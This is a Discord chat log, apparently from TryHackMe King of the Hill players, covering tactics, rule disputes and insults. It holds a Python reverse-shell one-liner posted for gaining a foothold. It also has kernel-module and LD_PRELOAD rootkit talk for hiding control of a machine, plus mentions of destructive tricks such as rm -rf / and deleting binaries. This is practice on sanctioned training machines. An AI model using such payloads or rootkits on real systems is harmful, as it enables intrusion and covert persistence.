#koth
my main language isnt english so idk what context that was in
you just came out and said i was dirty
👍
My main isnt english too, nah dirty was meant with using chattr and then deleting it or whatever u did to make it unusable😂
I tried to reinstall it on the Target but it didnt work
https://github.com/posborne/linux-programming-interface-exercises/blob/master/15-file-attributes/chattr.c compile this static and then get it into your machine.
You can run private Matches solo to train right?
not sure ¯\_(ツ)_/¯
but you can do some koth machines as normal ctf rooms from tryhackme
like food for example
Yeah i already marked these 2 for me
No, you have to have at least two people for the machine to start. You can queue it solo, but it will terminate if there are not enough people (at least the ones I've tried).
Nope, need two ppl for machine to start... If you want to practice I can join your private match, I won't be playing but at least you could enumerate and get familiar with the machines, just send me the link when you're ready
can anyone decrypt it?
wget https://raw.githubusercontent.com/posborne/linux-programming-interface-exercises/master/15-file-attributes/chattr.c -O chattr.c && gcc chattr.c -o chattr -static && sudo python3 -m http.server 8000
problem solved 👍
i understand the wget, the && is for another command in the same line right? but for what the python web server?
On koth machines you obviously don't have access to the internet, so you can't download anything from outside, you have to download it to your kali vm for example, compile it there, and send it to the koth machine, that's why the webserver
btw, the only binary that can be deleted is chattr, so there is nothing dirty and nothing against the rules in this, it is always good to have your own chattr compiled in case someone removes it from the machine
i never said against rules or sum, its just my way to talk
You can modify the chattr code to write your username every time someone uses it. There was one chattr_borked.c just for this, KoTH.
everyone uses their own chattr these days no one would fall for that 🤣
Yeah lol, worth a try for the first king (root)
Replace theirs with this, they should go crazy😂
👍
I don't even use chattr binary, this works for with ofc, with necessary includes:
int flags = FS_IMMUTABLE_FL;  /* 0x10 == 16; FS_IOC_SETFLAGS takes a pointer to the flag word, not the value itself */
ioctl(fileno(fp), FS_IOC_SETFLAGS, &flags);
and, fp here is file_pointer to /root/king.txt
this 🚀
yeah, I've found 5 footholds so far in fireworks and 6 flags but 6th one didn't work for me || anyways who places sshot of flag 😩and yeah I'd used OCR and also manually checked value of the flag but it still didn't seem to work ||
idk I've spent around 3 hrs. in fireworks just searching for footholds and 5 were ones I'd found, and maybe there maybe more
just get good with king control and flags doesn't matter anymore 
agree 
@south pulsar what happened to the machine?
I don't know, I wasn't able to enter the machine
I think someone just shutdown the machine
Is it offline i cant even nmap it or ping but i am not king anymore, rude 😂
Also how did u find the flags i couldnt find any flag.txt file?
Ha ha , cause of shutdown, what's your id ??
Wdym id?
I just deleted all the flags 💀, after i get them all
THM ID ??
Nah bro thats rude💀
So rude ,💀
I am JustKev in THM and the Match ID is 103710???
Okkk so you're already king
No, the machine is offline so i dont get points, u won
I think 0xReDrag0n did this
But how ??
The machine connects back to the thm servers to tell them who is king and if the machine cant connect back she cant tell who is king
Ohh I got the answer now
Let's join a different one
Hmm?
Yeah im not doing anything rn, next game maybe
yahh you already playing that
Yeah im in but not playing, needed to do something, now its to late
Deleting flags is against the rules❌
Yahh i know that ,I just make fun of it
U won the round only cause of it but idm that u did it😂
Yahh, btw thanks buddy 🐱
Gave +1 Rep to @sturdy fox (current: #2151 - 1)
Thanks for what?
Gave +1 Rep to @south pulsar (current: #2151 - 1)
@short tusk i already apologize for this
Yea deleting flags is a little dirty especially when playing against newer players.... So here's a little tip, create some notes for every machine you play, when you find a flag add them to your notes for that machine... Then when a player wants to delete the flags you already have them in your notes 😉...
Also if you'd like to play some practice matches so you can enumerate the machines just hit me up, I'll join the match but I won't be playing so you have full range of the machines, do what you like to them ... @sturdy fox
yeah thats a good thing but for me its not right yk, its like saving the id_rsa in your notes to access a certain machine.
yeahh thank you for that
Gave +1 Rep to @broken pilot (current: #75 - 87)
also if you rename the king.txt it is no longer recognized and gives no points right? cause today i had someone who named it .king.txt and it was not giving anymore points for being king
What's wrong with that? I see it as good note taking... You would save everything if it was a normal machine... Most players have all the loot saved already anyways... That's why you will see ppl with 58 mins king time lol
Yes if you rename king.txt then you get no points
didnt know everyone is saving them dangg, im saving commands in my notes for some things thats all lol
I mean the key should be find a way in the machine, document how you achieved this, then next game or if you have control of king, look for another way in, document that... There's at least 3-4 ways in for every game... That way if a player patches the machine you might have a way in that they forgot to patch 🤷🏼♂️
same, all thanks to loot I was once king for 59 min. lol
id_rsa of duku, then net-kit ftp's priv esc then straight king!
@timber vale why you use 2 id!!! while playing koth ?
No, but i know the user of that account personally
He is just starting out in thm
bro don't lie , even a child can guess it , that these are your id
is this because you cant win with me every game you join with me i destroy you and you are running from the current game cuz you cant get king?
🧐
that is not the first time
first time of what?
no, because you use 2 id , just for cheating
Haha 😂 first i dont use two ids second you just cant get king and how would some other account help me with being king 🤣
just admit i destroy you in every game so you just want to get back at me 🤣
and btw stop using autopwn , play honestly
wtf 🤣 i have the id_rsa key for ashu how is that autopwn 🤣 i just kicked your a** and you just here doing this stuff running from the original game cuz you cant get king 🤣
you use 2 id's , stop thinking that everyone is fool like you
🤣 🤣 do you want a private game or what 😂
😂 i will destroy you like every time
every script kiddy speaks like this
😂 a script kiddie always kick your a** wow 😂
i know youre the mf
come then
🤣 dm me lets choose the game and send me the link i will kick your a**
you have a sub i dont
ok, i dont choose the game , its a random
what if its windows 🧐
i dont have fears
alright dm me the link
lemme join 😉
for any one who wants to watch the live beef 😂
https://tryhackme.com/games/koth/103748
15 yo boy is going to kick his a**
lets do 3 games who win the most dont bother the other anytime 😂
Let's try to keep it a bit more professional. @timber vale @south pulsar
why you joined and your name inside king?
you disrupting the whole operation you arent inside the game did he dm you the ip 😂
idk u said u'd kick his *ss do it if you can else f right off
so its like that
do what u said, else don't bug around.
i want a proper game just me and him 1v1 dont do this shit to me 😂
u used 2 acc 1st kiddo
you both come play against me and you have your cheating methods with you thats not fair 😂
"do what u said".
wdym cheating methods, stg I didn't use any one lmao
first i dont have two accounts second you cant talk about that you know about what you did to the koth service every body remember that
you're moving away from ur words
haha fun
🤣
i didnt say i want you both i said i want 1v1 and you disrupting the whole thing he must have dm you the ip 😂
you were not able to kick his *ss
😆
tbh, nones fair here
including me
im not even playing after i saw you in the match i dont do this shit
so do what u said 
im still saying i will kick his ass but 1v1 without he dming the ip to anyone
ohh u decided to run away, fine
thats cheating what you both are doing im not here for this shit i said 1v1
@south pulsar maybe @timber vale is scared of u
I dont get scared of buncho of pu**ies
then play.
im not scared of him neither im scared from you anyone wants to play a proper game comeone
i win or i lose but with my dignity and no cheating from your parts
I gave him some of my stuff, maybe he compiled them without editing
yahh he is a fucking kidde
some of your cheatings 😂
that's where u got to see my username
@north wolf i think someone need 9999 fake id's to win a koth 
this last 2 weeks i won more games than you two ever won so shut up and close your mouth 😂
idc.
alt acc thingy
and u saying kicking *ss of 15 y.o is what made me share my goodies with him
else, I didn't care
ahem
language.
@mods 😅
Guys, just leave it. Follow the rules from now on and be fair, that's all
@.scrubz. a bit of an issue here😄
Who is the script kiddie now i code my Own stuff to protect king🤣
@near lily
bruh, he's learning. And, I "gave" him. He didn't "ask" for it. FYI.
and he just ran it without understanding it 😂 or knowing what it does
there are proper comments to understand what my code does, and the only part was the username definition within the code which he just prolly forgot to edit

He didn't even take a look at it or else he couldve changed the username 🤣
and someone didn't even care that alts can be identified easily.
chuck it
not talking anymore in this topic.
🤣 i told you that is not my account and you dont have a prove but we all know that you didnt care that cheating can be identified just as easily
btw, biggboss izza watching 😆 (gifs lolz)
haha, funny.
i dont know how you are still even talking here im done with this shit i cant take it anymore 😂
..
Can I join the fun later 🥳 😉... Why everyone so mad???
sure! lmao, You're most welcome!
yahh buddy @broken pilot
i joined a public game with him destroyed him and he came here talking shit about me 🤣 but i dont care he knows what i do to him and i know 👍
We can do it publicly or private don't matter
anyways someone wasn't able to do what s/he said
Personally I don't see how 2 accts would help take king... Only thing multiple accounts are good for would be to spam resets.....
personally i dont even do resets cuz i always win what would i get from that ?
@north wolf I think you may have misread what ch1 was saying... Ch1 is the 15 yr old...
oops, my bad
Ok when I get off work I will ping you guys and let's orchestrate a big game 😉...
sure!
Thanks.
Gave +1 Rep to @placid fable (current: #40 - 185)
i like how silent it is in here now
boom baby
But bruh 0 king points....
yeah but looks like king isnt available cause no one of them rly got points of it
can you see the winner ??
..
Yea I do ... 🥳
...
presented by ?
presented by a bit of beefing (not sure whom to mention here, exactly)
but sure about powered by THM!
ok so lets do it
wait wait, waiting for everyone to get ready
Bruh I'll drop link when I get off work....
exactly, @south pulsar ☝️
Get your stuff ready in the mean time 😜
okk
idk what to get ready, I'll just smoke a cig that's my prep.
@north wolf @south pulsar @timber vale and whoever else wants to play
15 mins
@north wolf @south pulsar 5min
20 mins
I see now why I quit koth, and I don't regret it at all lmao.
Mission: impossible
😆
I'm sorry, I wasn't able to join.
nice, there's at least a guy (always) on koth queue lol
Why I am not able to join koth ? It's saying not found
are u trying to join the link from Ch1?
Nah, normal koth but now the problem is solved
And how did you enter the machine so fast.? @timber vale
you need to upload a rev shell to 5000
a python one
I uploaded a reverse shell.?
yeah thats what i did you need a python revshell to run on that werkzeug server i think
I didn't understand what you mean bro
You mean I need to upload a reverse shell, right.?
i used port 5000 uploaded a revshell
it needs to be a python script 👍
that give you a shell
#!/usr/bin/python3
import os
os.system("bash -i >& /dev/tcp/<ip>/<port> 0>&1")
you can just use that
Okie ty
this happens sometimes to me and some times they say i can only enter two scheduled games at a time when im not even in a game
Yeah thats their limit but i was facing different issue
im recently experiencing other bugs i dont see the type of the machine i need to refresh and the ip also and i need to refresh to update the points like there is no live update on anything
and my koth page is also not updating automatically every minute
maybe they are doing maintenance as mentioned in the notification bar
yea
i just stopped using it to monitor king i started using watch -n 1 curl -s ip:9999
Ooo
but the problem is resets when some one reset and the machine doesnt shutdown you can never know without refresh
ip of our openvpn or ..??
no the ip of the machine the koth service running on port 9999 tells you the king
oh
It's not even a flex buddy, go touch some grass or find a job
yeah i got nothing else to do i train i go to the gym but this is my vacation and i dont have school so i have full time koth 😂
you're not gonna get rid of me that easily i will continue to be in every single game each time i can 😂 to take the win from you
@violet zealot @fair adder
From who? I don't play koth anymore
Does someone know if bluez8866 is cheating?
I am in the shrek machine with him, he kept killing my connection and now he turned ssh off after making himself king 💀
Ssh doesnt show on the ports anymore and i get the error connection refused, but somehow he is still connected, someone tips?
Well a good technique would be to add some kind of persistence once you get on the box that way you won't need ssh. You could also try scanning again for all ports maybe he changed ssh port. There should also be another way on the machine besides ssh if he hasn't already patched
All the ways, as far as i know for the shrek machine, leave ssh keys, no i scanned all ports and only 22, it said closed ssh.
@north wolf I thought youre a changed man?
does that remove the shell or what exactly?
it removes the built in bash binary
so the shell
lmao
Depends, if /bin/sh is still there you can use that
Or any other shell, like on debian(based) systems /bin/sh is a symlink to /bin/dash iirc, so if they didn't remove all binaries it's likely that only the symlink /bin/sh is removed and /bin/dash can still be used.
Where can I find the linux headers for the food machine? (4.15.0-91-generic)
/bin/sh exists.
btw, thanks to you since you motivated me to write a rootkit
Gave +1 Rep to @civic vortex (current: #881 - 4)
but u can't remove the bash
im pretty sure it's against the rules
my bad
but my rootkit makes me wonder since there's no king.txt in /root but cat /root/king.txt responds fine
How do I compile my LKM for the food machine? Where can I find the headers
if u are talking about the linux versions, im pretty sure matheuz or someone else shared them
.
mods should pin it for further related questions 👍
yaay! now my rootkit works as expected, but idk why i see two usernames lol
@south pulsar @upper basin @timber vale @broken pilot ?
I meant how to actually compile them. I know the version
then idk what u mean by that, u just have to compile with gcc or anything else?
Mistapped sorry
I have to compile the lkm using the 4.15.0-91-generic headers. I have installed the headers but when i try to make i get an error bc the compiler is trying to access the asm directory but in the headers its named asm-generic. And no linking doesnt work
@north wolf
@north wolf may i dm you
sure
Cause u can put multiple things in a text file?😅
@timber vale wth did you do to that king file ?? 😂😂 good game
what is your username?
@sour lodge
MrMarket
@north wolf
@quiet schooner can I DM you about koth?
Bro fr what is Bluez doing??? He got in the machine again and turned off the ssh
I think he even deleted ssh cause there is no ssh anymore💀
23 king changes 😄
Yes
Yeah i got in from a reverse shell and he wouldnt let go xd
Ohh u were in the Match too
not me. maybe Binary exploiter
Yeah i meant him
setup your persistence
yea but actually he just broke the rules a second time (or more)
so maybe mods can take some actions, because tbh i see many people cheat but nobody gets banned
I guess it would all boil down to what is considered a bannable offense.. like changing the executable permissions on say /bin/bash is technically against the rules but would this constitute a ban?
Anyone from NSW?
if it's repeated, yes
if u broke the rules just once, it's okay but if u cheat like every game u should be banned
But then again this is an easy fix ... chmod +x /bin/bash ....
it's not because u can fix it that u can do it 
Yea but should you be banned for that...
again, if it's once no, but if u do it repeatedly then yes
otherwise what's the point of having rules?
Now I can see rm -rf / or modifying koth binary or attacking others players being bannable
everything that is against the rules should be bannable, even more if you repeat it.
i only played against him 2 times and he cheated both times idk if he does it all the times. i reported him both times now, im just not gonna go in a game where he is inside.
but you also have to keep in mind that changing the ssh port is not against the rules, if you do the port scan again, you will see the ssh port
if that's the case
yes i know, i scanned multiple times, i also only scanned 22 and it said "22 - SSH - closed"
Did you scan with rustscan or nmap? need to see all the ports
both, im not that familiar with rustscan so i normally scan all ports with rustscan and then nmap -A with all the opened ports
or in that case with the closed port
so you didn't scan all ports... you need to use -p-
for scan all ports
by default nmap does not scan all open ports
oh, it doesnt?
Yeah, nmap does not scan "all" open ports, so you need use -p-
for nmap yes, what i do is rustscan -r 0-65000 after that nmap -p (all the ports from the rustscan) -A
it does only scan the first 1000
guessing that the first 1000 are the most common ports?
yes, thats why people sometimes change the ports, so u need to recon more
I can see blatantly cheating being cause for ban under certain circumstances... But I think there are some grey lines in the rules and it would then depend on the perspective of what is actually considered cheating... Cuz rm /bin/bash no problem can still use sh... rm -rf / ... Problem that was blatantly used to ruin the machine for everyone .... Blocking ip's using iptables.... Blatantly breaking rules... Alias on echo... Sneaky... Can still change alias and machine is still up... All depends
yeah every case is different but in my opinion closing the ssh port while u can just change the keys, on a machine where 90% of the ways to get in via ssh are is just not rule conform.
I've seen people ruin all the machine's memory with dd
What does that even achieve, it ruins the match for everyone
but he wins 😉
Its called being a huge dick
yee
If you're still in the machine it's a good idea to do something like systemctl status sshd because usually that reveals the new port and if ssh is still running or just stopped
no it was a few hours ago, i got in from a rev shell + i think he uninstalled ssh cause i tried that status thing and it couldn't find it + all the .ssh directories in the users got deleted
But this also demonstrates the importance of persistence... There are other ways in the machine besides ssh... Bet they didn't patch all of them...
also bluez keeps disconnecting the users, so if u play against him be aware of that 😉
Like killing your shells?
yee
yeah i know i worked on that, got in from a web rev shell but he had a loop or something cause i couldnt get his name out of king.txt
Add some persistence, and do it back 😉
Flood his terminal with urandom make him kill his own shells 🤣
i know what u mean but bro im a noob idk how to do all that xd
So now that should make you want to look into the running processes...
i know how to get in the machine but idk how to keep them yet
That's the point tho... Sure it might be annoying but by going through it you will learn how to defend against it...
ps aux right? cause i looked at it but i couldn't find anything or i just didnt see it, there was something called sleep 1 tho
You gotta think in real life situations they are not going to be playing by the rules.... You will need to adapt to the environment you are in 😉...
Yes, I would even do ps auxf for a forest view... I would also look into sleep 1 cuz that seems suspicious... Look at the process id number of sleep 1 and kill it... Try adding your name to king did that work if not inspect processes again
Could also use something like pspy64
whats that?
It's a process watcher, to monitor what other players are doing
https://github.com/DominicBreuker/pspy
If you're around later I may play a couple games tonight... Can show u a few tricks if you're interested.
https://tryhackme.com/games/koth/join/2b487691a00ee3d02a5ab21a
if anyone interested
didnt plan anything for today, yet. should go, but what is ur timezone? cause its 6:30pm for me
Ahhh ok it will probably be late for you then... Maybe over the weekend just ping me
tell me when u play i will be awake for at least 6 more hours xd
Ok It will be at least another 5 hrs... Would probably be best to shoot for the weekend. That way you can take some notes and benefit from the games...
its 3:12 am im going to sleep but i will play with you tomorrow if you want 👍
Bro...just oversleep for a bit so I can at least get the false impression that I may win.
i will stay sleep for at least the next 8-9 hours so you can play all you want rn 😂
Free after like 3 hrs?
Ehhhhh I’ll probably be in bed
Ah alr
crazy how everyone is in a different timezone
any one having problems with vpn?
i tried changing servers and redownload configuration but it just doesnt connect
my internet is good my ping for google.com is 73ms
2024-08-03 08:02:31 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-08-03 08:02:31 VERIFY EKU OK
2024-08-03 08:02:31 VERIFY OK: depth=0, CN=server
2024-08-03 08:03:32 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
2024-08-03 08:03:32 TLS Error: TLS handshake failed
2024-08-03 08:03:32 SIGUSR1[soft,tls-error] received, process restarting
2024-08-03 08:03:32 Restart pause, 1 second(s)
2024-08-03 08:03:33 TCP/UDP: Preserving recently used remote address: [AF_INET]54.76.30.11:1194
2024-08-03 08:03:33 Socket Buffers: R=[212992->425984] S=[212992->425984]
2024-08-03 08:03:33 UDPv4 link local: (not bound)
2024-08-03 08:03:33 UDPv4 link remote: [AF_INET]54.76.30.11:1194
2024-08-03 08:03:33 TLS: Initial packet from [AF_INET]54.76.30.11:1194, sid=d472c3c2 ffd9599d
2024-08-03 08:03:33 VERIFY OK: depth=1, CN=ChangeMe
2024-08-03 08:03:33 VERIFY KU OK
2024-08-03 08:03:33 Validating certificate extended key usage
2024-08-03 08:03:33 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2024-08-03 08:03:33 VERIFY EKU OK
2024-08-03 08:03:33 VERIFY OK: depth=0, CN=server
this whole log gets repeated over and over again without connecting to anything
PING google.com (142.250.201.174) 56(84) bytes of data.
64 bytes from par21s23-in-f14.1e100.net (142.250.201.174): icmp_seq=1 ttl=128 time=73.2 ms
64 bytes from par21s23-in-f14.1e100.net (142.250.201.174): icmp_seq=2 ttl=128 time=73.4 ms
64 bytes from par21s23-in-f14.1e100.net (142.250.201.174): icmp_seq=3 ttl=128 time=73.4 ms
Hey @glass isle u in yet?
nope
i only have mysql flag
ssh is down or smth
port 58342

yeah H4DES is a strong player
i didnt rescan all ports after finding all
i got a ssh user from sql database so ill try
pw got changed 
gotta go... goodluck @sturdy fox
yeah Match is over xd
gg hades
gg
I was just installing Docker on my host to escape the containers 😂
How did you do that? Plain curl?
Jumping on for a few quick games before I go back to my CySA + studying that isn't going too well 😂 https://tryhackme.com/games/koth/join/a761ef206a3e7f0607d4befe
Check out hacktricks docker escape
aliali..0541, why are you killing the login sessions? And, the /home/ashu/flag.txt has root:root user/group. This is against the rules 
who is bluez?
exactly.
looks like someone who doesn't like to follow the rules, hence would like to have a match against him
did someone already change http admin page PWs? 😮
oh what happened to u with him? 👀
Hey kaali01🙌🙌🙌
Really changing passwords is allowed?
Then if I am unable to find the root first then it's like done
I can't do anything one who becomes king is king
having the passwords is normally not the way to get root, as far as i know
There are obviously other ways to get into the machine, other than just SSH logins or web logins
that attitude won't get you very far for koth, other vulnerabilities on the box exist
every one is having fun in koth without me 😂 i reinstalled the whole vm but i still cant connect to any openvpn not thm nor htb have fun guys 👍
same problem
i tried a new vpn server and redownloading the configuration that didnt work also. did you try it?
I tried every single VPN server in the THM access page.
yeah i did that too but nothing changed
i will try to reinstall my vm but this time test htb first see if it works cause my htb vpn was working fine before this
first time my vpn malfunctioned i restarted my machine and i found that the configuration in /etc/network/interfaces for eth0 is deleted
i restored that but also couldnt get network access cause when i do ip route i see nothing so no route i fixed that but nothing changed
Check if your host machine is using VPN through Anti-virus or if you use a separate VPN tool.
i use kaspersky but i never got that problem before
There is no harm checking. It may be updated.
yeah i will do that but i dont have my laptop rn.
🤣 🤣 🤣 not cool to remove binaries.... how you gonna take king from me now 🤣 🤣 ..... aliali..0541 ....
hahahahaha you tried to mount and remove both mount and umount..... but now it has backfired on you 😉 Good Luck have fun 😜
hahahahahhaha weak bro .... you didnt have to poweroff the machine
anyways GG
see ya next time
This guy didn't follow the rules last time I played with him
yea he was still playing dirty against another player so i decided to step in and take control... he got mad and shutdown machine 🤣 🤷♂️ ..
they are so funny, turning off machine to help us secure king
@broken pilot would open sourcing my rootkit break the game
i still think rootkits are cheating
How
Since it's not breaking the rules it gives you the complete freedom of using a rootkit yourself
Now I can see why it could be considered as cheating but it's not
I mean a rootkit is autopwn and autohardening isnt it?
If it was they could've locked the kernel to prevent LKM rootkits.
Not really autopwn. How will you autopwn something if you're root alr. About autohardening, sure but if that's auto-x how isn't using the mount trick or other one liners the same
Cause the auto thing is what makes it cheating, if u use the commands on ur own okay but having a program which does all that for you is something different yk?
But im sure THM knows about rootkits getting used and if they dont do something ig do it
So if I put the commands in a sh file it's suddenly considered auto?
While copy pasting them isn't
idk that is the thing, what exactly is autopwn and autohardening
cause for me auto means that for example a program does it for me
Then how come you dk? You just answered my question
everyone has its own opinion about it thats what i meant
So you do think that putting the commands in a script instead of copy pasting them directly in your shell is considered autopwn
Well, if you have mixed up definitions how come you say rootkits are autopwn
thats why i said at the beginning "i still think"
I also said "so you do think"
yes
Autopwn: a script that gives you a root shell with only the ip, autoharden is imo about patching vulnerabilities
That sounds pretty wrong, give it a second read
Not trying to argue here, just so you know
and a rootkit gives you root with just ip doesnt it? i heard players have rootkits for the machines, so they only put in ip and they won
Huh
Define a rootkit
A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software.
So no, you need a foothold in the machine and rootkits are meant to provide a backdoor. Not to gain initial access.
In our scope, koth, rootkits are loaded after you become root, to manipulate kernel space functions to protect the king
Generally speaking
Ok, so that's the misunderstanding here
Yup. A huge one
i know what u mean but i also know that players have what they call rootkit, a program where u just type the ip and maybe the machine type from koth and they have king, cause the machine have the same vulns but they change a bit. so what i meant is, there are many players which have programs where they dont need to do anything except typing the IP to win.
That's not a rootkit albeit the definition for rootkit on Wikipedia is a bit misleading. These programs are autopwns. Rootkits are not autopwns
@fading moat out of wonder where you able to make your own write_hook?
A write hook is practically useless here ;)
wdym by useless?
Think better, why would a write hook not be the best option
Hey @broken pilot wyt about what I said on open sourcing my kit
Idk honestly, it's looking like more and more people are using rootkits to control king.... At some point it's just going to become who has the better rootkit.... But I'm also noticing that this is the main way some ppl control king... And if we created a game where no rootkits could be loaded I'm wondering if they would still be able to control king or would this make it a fair match.. cuz when you use a rootkit on a newer player, it could make them no longer want to play or resort to cheating.... I think rootkits should be last option when playing against better players instead of used on every single game against every player....
I see wym. But since you put it this way, open sourcing rootkits will help new players develop their own, or understand how to defeat them (less likely). I don't necessarily see why the game shifting towards the use of rootkits is a bad think
I mean there isn't only 1 way to skin a cat but write hook sounds kinda great to hook from other sys_calls and tbh I didn't take a look in sys_calls to know which is the best to hook so far.
Thing*
When you do, you'll start laughing
Depends on what quality of a skin you're going for ;)
A game without rootkits would probably mean that the one that has the most resource intensive script will win so idk if it would be a fair game.
True, open sourced rootkit could be used to learn how to implement and could get a bunch of ideas to improve it (not a bad thing)... But just like everything else it could also enable ppl to abuse this .. so I think if you release an open source rootkit just don't make it unstoppable....
Yea but scripts are a lot easier to find and stop than rootkits....
Yeah my rootkit is relatively unstoppable
We would know better if you test it sometime ;)
True, but it would mean that a lot of machines will crash, if it's a rootkit you just have to find a loophole or remove it when possible.
How'd they crash tho
So now think if everyone had it and all played at once 🤣🤣🤣🤣... Id release like a public version and hold on to the unstoppable one
Have you tried bypassing a rootkit?
I will get to it 🤣 I forgot over the weekend... I may play a game tonight I'll ping you and we can test it out
Yeah
It's possible, just find an edge case
Were you successful?? It's a lot harder than finding a loophole in a script or just killing the PID of the running script...
But I only did this with one rk, so idk about others
Just start the food practice game and send the ip
Yeah, a few times
I'll be home tonight
I'm not at a comp rn. But when I get to the house I will
Ok, good job. Was it as easy as running ps auxf and killing script??
It's actually very easy to detect your rootkit, craig the creator of Agentless Linux Security also agrees with this, the problem itself is just adding correctly to lsmod, restoring completely, which I can't work on at the moment because I have other issues To resolve this, don't think you're a god because of this, just copy & paste what already exists on the xcell blog, among others 😄
Not really, you can try it yourself. You're still trying to prove something. Grow up, it's not everything about you.
How do you know without seeing the source code 🤔
I'm not trying to prove anything, I'm just saying reality
Sure bud, nice one
But creating a tool from scratch to detect and remove rootkits, try it, because making a rootkit is easy, you can just look at xcellerator 😝
developing new tricks for defense
No, it took lots of time and trial and error to find a way to bypass one, but it's not impossible
For you, it might be just that. Not all are just copy pasting stuff they find;)
Nah, you said it yourself that the xcell blog helped a lot
This guy 😂 does it mean I just yanked everything I found on there
I just said the reality, your rootkit is not unstoppable, it never will be, and next to an EDR/XDR agent for Linux, your rootkit seems like a toy to deal with 😄
Again, you're trying to prove something. Calm down
What would you care
nothing is unhackable you know
That's my point tho... I know it's possible to bypass, I've bypassed many but for a new player it could seem impossible... The goal should be to get new players excited to play and keep them coming back
Saying "My rootkit is unstoppable" and having a counter argument applied then saying "you're trying to prove something" is terrible arguing.
Really it's tit for tat.
True, it was a bit of a personal challenge for me to defeat it, otherwise I probably would've given up.
I said relatively. Second of all, matheuz is for some reason obsessed with trying to prove me wrong like I have done something to him. I had already informed @sonic belfry for him dming me out of the blue starting to make fun of my projects with no apparent reason
No point bringing Tim in to this, and I'm not saying matheuz is innocent either.
You both need to cool it, if you don't have anything nice to say, probably best you just stop.
? You were the one who started all this in the f11snipe chat, wanting to call my project and research something completely useless, first of all, you didn't even know how it worked
everyone saw this
tagging me there
If you hadn't started all this there in the f11snipe server chat, I would still not know of your existence
I can relate that's how I figured a bunch of ways to bypass them was just a personal challenge... But not everyone thinks this way... I try to find the newer players and teach them a few techniques to be able to compete, to keep the game alive... If everyone is using rootkits wouldn't be as fun IMO...
There is, he told me to let him know if he acts the same. Also, how is it tit for tat, I never said anything personal lol. And matheuz seemed to confuse my criticism towards his lkm detection from the start which made him turn aggressive against me. It was never my goal and he is keeping at it
Once again with your inflated ego. I literally don't care if you didn't acknowledge my existence. How's that a point
Im not asking, I'm telling you both to stop before I mute the pair of you.
Please stop trying to make fun of me, it's annoying and doesn't look good for you. Please
Aggressive towards you? lol, at no point was I like that, you're telling lies, if you want you can even enter the f11snipe chat and see the messages, you're the one who started all this, I was quiet in my
This is why we can't have nice things guys 🤣🤣🤣🤣 just playing...
Sure go ahead, this is a fucking joke. The dude is harassing me for no reason and somehow I'm at fault? Lmfao funny
I was aggressive towards you? lol, I even tried to help you understand what imperius did
Are you acting like a poor thing now? lmao
sure
You'll get us both muted
:mute: anti_sysadmin#0 has been muted.
So kindly stop talking
You do realise you were part of this conversation too, right?
You're in no way innocent.
Didn't I stop talking
Huh
Reading all that rootkit talk, surprisingly I started working on one last night 😆
Lemme know when you guys are connecting, happy to learn something : )
Good luck mate. Feel free to DM me if you want to talk about rootkits. Let's learn from each other
Thanks : )
It's all academic, I have studied the xv6 system in uni, it was great. I don't know much yet, around the actual Linux kernels. So, I will be learning from you guys : p
Gave +1 Rep to @fading moat (current: #1092 - 3)
Interesting! I am new to this too, first stumbled upon xcellerators awesome blog to get me started, then I got around by reading through kernel source code (elixir bootlin my beloved) and the help of some awesome guys over at tmp.out, had a lot of problems in the way but managed to get through.
And I discovered some very interesting techniques on the way
eBPF is also a good way to hook syscalls 😄
Yeah
with eBPF you can detect rootkits, for example the aquasecurity tracee, but you can also hook syscalls with it
There are security solutions on the market that use eBPF
That's interesting I hadn't come across that before
XDR for Linux it also has very good protection against rootkits
No
Some XDR also monitors kprobe events
I'll check it out
in a paper I wrote, I also mention eBPF
@fading moat Yeah, got it working. The kernel module, for hooking into the syscalls 
Hehe, nice. Did you use ftrace hooks?
Yeah, for now I was following along the post that Matheuz mentioned
I see
This thing is still ineffective, may I know what all am I missing?
~
https://github.com/profxadke/kothrk
./doit.sh
From what I can see, it's effective in the userland. And IIRC, a static binary won't be needing to load the dynamic symbols from your shared library.
There has been some talk around the Linux Kernel Modules (LKMs) which would run with more privilege in kernel space.
Matheuz and others have worked or are working on something similar for KoTH's king foothold
@north wolf
I was studying the LKMs, and have written a little something for KoTH. Lemme know if you wanna test yours against it, it's pretty barebone atm.
nvm, just tested it. It didn't work with the older kernel on the KoTH machine 😆
You're also intercepting just a few functions, like you only hook open(), but there's also open64(), fopen() and fopen64(). The same goes for your other hooks. And of course a static binary is unaffected by this technique.
GG @timid ore!
my first time doing koth. Cooked 😂
btw kaali, if you see this would love if you can explain your methodology and the tcpwrapper thing :)
Just asking guys, do people have some kind of automation setup, They get king within 10mins, I am not able to crack it within 1 hour😮💨🥲
How many boxes are there in all of koth ?
Many people have notes for all the machines knowing how to get in, every machine has multiple ways and yes some people have automation. Ur first Match?
Yes
What machine?
@tacit ridge we can make private games if u wanna learn the machines
that is paid🥲
Only the Host needs to have premium and i have premium 😉
there is also sys_openat 👍 which is used in most new systems
do you mean openat() and openat2()?
there is sys_open and sys_openat and sys_openat2
syscalls or functions in libc?
syscalls
but there are wrappers around them in glibc of course
the openat2 is very new its like 5.6 +
this was about a rootkit that uses ld preload, so then he needs the libc functions
openat + openat2 are indeed libc functions, but they're harder to intercept and do checks on
because it takes a file descriptor to a directory as argument you have to get the file/directory associated with the fd
👍
why are only Wizard or higher lvl people on rn? 🥲
It seems I got really lucky on my first koth there weren't any high level
i have, God, Harry, Master and Hacker against me rn xd
The best way to learn is to surround yourself with people who are further along than you. 😄
the THM rank is different than koth experience. The 0xD-GOD rank means the user completed a certain number of THM rooms that got him to level 13 (max) but this has nothing to do with koth games. If he plays for the first time, or didn't manage to study the machine you play and find a fast way in, you might win, as you already did, with 49 minutes of king. And Lion machine has the fastest root foothold that can get you king in seconds.
BTW I guess you already know there are websites like F11snipe's koth.guru that you can use to check on your opponents and get an idea of koth experience and how many games he played...
uh no i didnt know there are websites to check it lol
yeah i know that the level shows like how many rooms but with rooms u also get knowledge
You also get knowledge working as a linux sysadmin, or cybersecurity analyst, but when it comes to this competitive game of attack and defense, the speed is more important than knowledge. It doesn't matter if you know how to exploit a vulnerability if someone else exploited it before you and patched it. It doesn't matter if you got in and patched all the ways you know, if someone else knows a different way in, finds a way to privesc, loads his lkm and locks you down...Best way to train IMO is private games, Enumerate, get in, get root, and enumerate more to find fastest way in but also as many alternative ways in.
That is a cool site
